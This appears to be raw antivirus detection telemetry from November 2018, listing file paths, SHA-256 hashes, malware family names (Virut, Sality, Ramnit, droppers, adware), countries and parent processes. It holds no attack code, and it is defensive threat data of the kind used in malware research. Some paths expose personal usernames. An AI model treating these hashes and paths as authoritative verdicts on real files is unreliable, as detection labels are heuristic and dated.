  Row(detection=Row(filename='wsbaf9cd7d26a2eabf53ab041041081290f-7fc9.html', filepath='\\\\?\\C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\PremierePro\\3.0\\WSbaf9cd7d26a2eabf53ab041041081290f-7fc9.html', filesize=8000, name='W32/Chir.B.#M1.#R1'), hash='6e8f428013e3ef2e52e2c4f68898090ec3c2e9140192469c311297135669b00f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='silence_finder_setting_parameters.html', filepath='C:\\Program Files\\Audacity\\help\\manual\\man\\silence_finder_setting_parameters.html', filesize=172000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='56a5b9cbaf651264d4469bb5e8c9d585339aa9439cfbb3bca0c2209d6a59dbbd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:53:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e5a061ac4cdcceef11033f86e9e19de8ae95e95c7844f859e1554710b3130eb8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E5A061AC4CDCCEEF11033F86E9E19DE8AE95E95C7844F859E1554710B3130EB8', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='e5a061ac4cdcceef11033f86e9e19de8ae95e95c7844f859e1554710b3130eb8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:18:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall.exe', filepath='\\\\?\\C:\\Program Files\\AIMP3\\Uninstall.exe', filesize=3556000, name='W32/Sality.AT.#M1.#R1'), hash='df7ff6ae01d1698a7ebaa94816afc7ce19b02c508280757459d6779097bb5443', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:22:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9F3EF947F7082BF578689427E9BE445BB650A727CA3AD8D73E0277C50703630F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:26:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150504-582b88c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-150432-515911F0\\AVSCAN-20181101-150504-582B88C0', filesize=1024000, name='ADWARE/Kuaiba.1024000.1.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:05:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7a05b95674ef8ba86dd128bba104bafda98999b46e94ba3445b39da323bc3eae.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\7A05B95674EF8BA86DD128BBA104BAFDA98999B46E94BA3445B39DA323BC3EAE.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a05b95674ef8ba86dd128bba104bafda98999b46e94ba3445b39da323bc3eae', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:34:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112042-44360a19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112042-44360A19', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:20:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080518-6dd8c09b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080518-6DD8C09B', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aztec .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\data\\aztec\\aztec .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='893f3c93823abf3f2252f05930ed77a3116f3a6b28e4cc66df2c176d1b2eff4f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-035940-4c13f152', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5de6c7eb\\AVSCAN-20181101-035539-196EC8EF\\AVSCAN-20181101-035940-4C13F152', filesize=832000, name='TR/Snarasite.807b68.#M1.#R1'), hash='807b6827c5a58b9bf1505ddd4556e81aa286e90a324b8d263f95e5a31e9fe122', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:59:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autokms.exe', filepath='C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T19:12:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='166340.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\166340.exe', filesize=1536000, name='TR/Crypt.TPM.Gen.#M300.#R2864'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T18:40:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001045-3295b1fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2884ab49\\AVSCAN-20181102-000943-25575192\\AVSCAN-20181102-001045-3295B1FA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:10:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[2].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[2].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003148-7518b9ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003148-7518B9EF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0032871.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{726DFCED-3DF5-404C-B3E0-BCC96F47927F}\\RP8\\A0032871.exe', filesize=448000, name='TR/Patched.Ren.Gen.#M300.#R5151'), hash='707bca0d47f5b3a5b24ecdcc94a207bf957f16c67cb4f97d4fdc0a430f1a81c1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:38:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002805-5cdbe3c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002805-5CDBE3C2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:28:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T22:14:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:15:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbackspin billiards .exe', filepath='\\?\\J:\\العاب\\Backspin Billiards\\gBackspin Billiards .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='3ae78e642a1953aa9f4259f3032afc58f063271554ee18b5789d7a03664cfe72', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000ad16e', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000ad16e', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:50:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161515-4a455dcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cea85710\\AVSCAN-20181101-161403-3C6B61C0\\AVSCAN-20181101-161515-4A455DCD', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='81c7884894c8204284fcd9a931ecc21e5091366ac3e6b0bb22d16d65b6f7dce4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\81C7884894C8204284FCD9A931ECC21E5091366AC3E6B0BB22D16D65B6F7DCE4', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='81c7884894c8204284fcd9a931ecc21e5091366ac3e6b0bb22d16d65b6f7dce4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:20:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\D:\\UTILITY\\WRITE CD\\Alcohol 120% v2.0.0.1331\\setup.exe', filesize=10584000, name='TR/Agent.ahovu.#M300.#R5130'), hash='6437df76ccd1fc5c2a1b4ea394632e181d379355a70c3ce0458561d6c4df8e78', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0a53d555411440170378b12bc38ed2848a9fc8a784b2865b659283d0c0d0220e.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0A53D555411440170378B12BC38ED2848A9FC8A784B2865B659283D0C0D0220E.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0a53d555411440170378b12bc38ed2848a9fc8a784b2865b659283d0c0d0220e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:13:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='juni 2018.pif', filepath='C:\\Users\\X\\SUPPLY\\2018\\JUNI 2018\\JUNI 2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='0e2566c3dc29512bb4ba84812df5a9e35f6f725f3d3e34d60efb1458d055ea8d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:10:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:14:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\05FC403CFE21604B31AD3A635209320126C73C7986BA605C8D8F081B0CBC781E', filesize=180000, name='W32/Elkern.B.#M1.#R1'), hash='05fc403cfe21604b31ad3a635209320126c73c7986ba605c8d8f081b0cbc781e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:26:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='african farm.exe', filepath='E:\\العاب\\African Farm\\African Farm.exe', filesize=2368000, name='W32/Sality.AT.#M1.#R1'), hash='77fab084931064bb1820d011cdad9ab3772cb2cf72d0237318dd3e0f32f7f0db', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:12:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b4435', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b4435', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:55:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='datamngrui.exe.vir', filepath='C:\\AdwCleaner\\Quarantine\\C\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe.vir', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='689f8d95752084794c09edc4d7e50c7347428fee74c9a37327343f1a517cdcd6', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:19:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ktab.exe', filepath='C:\\Program Files\\Java\\jre6\\bin\\ktab.exe', filesize=116000, name='W32/Infector.Gen.#M300.#R7863'), hash='55386776a810d5d65182a61f3719f133ac2ab75586084dea8d9f93090566d474', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:56:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ye3eqczzrxc\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:59:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\Hasani\\AppData\\Local\\Temp\\2g4egfrte5v\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M2.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:17:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='utorrentie.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\uTorrent\\updates\\3.4.9_42973\\utorrentie.exe', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='d4df2d8a6ff16540e3cb90824f909e2c3550422c8cd430da9c73d19c7ffe40ec', metadata=Row(cmdline='\\\\\\/apps \\\\\\/fast \\\\\\/ext \\\\\\"exe,sys\\\\\\" \\\\\\/output \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Programs_SAMSUNGNP300E5A.xml\\\\\\" \\\\\\/log \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\" \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\"', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTel\\wicainventory.exe', parentsize=None, timestamp='2018-11-01T06:07:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145955-8b757f34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-145955-8B757F34', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\lu3i1iurlc3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:47:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='utn malinau 27-29 agustus 2018.pif', filepath='F:\\UTN MALINAU 27-29 AGUSTUS 2018\\UTN MALINAU 27-29 AGUSTUS 2018.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bollette.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\BOLLETTE\\BOLLETTE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mpstd.exe', filepath='\\\\?\\H:\\12.) DESHA_ITD\\5.) chao_mylo\\DRIVER PACK FOR ALL\\Drivers\\Audio\\REALTEK\\XP64_MCE_XP_2K_ME_98(A380)\\Ap\\Mpstd.exe', filesize=3904000, name='W32/Viking.AT.#M1.#R1'), hash='a1c01dc447e868681b0977bd8708f10e5b09963f6aaa45a0f315f68dddbd50ae', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='danh sách tập huấn xlhc.exe', filepath='H:\\\xa0\\USB__Data\\danh sách tập huấn xlhc.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='be2973225aeea112324261ea47eefecffcf932402940f8c860213cb0c52e6569', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='colloqui ed iscrizioni.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\MODULI 2016-2017\\COLLOQUI ED ISCRIZIONI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vendemmiatore.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\AGRICOLI\\VENDEMMIATORE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bgvmnyho.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\bgVMnyhO.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:46Z'), dt=datetime.date(2018, 11, 1)),
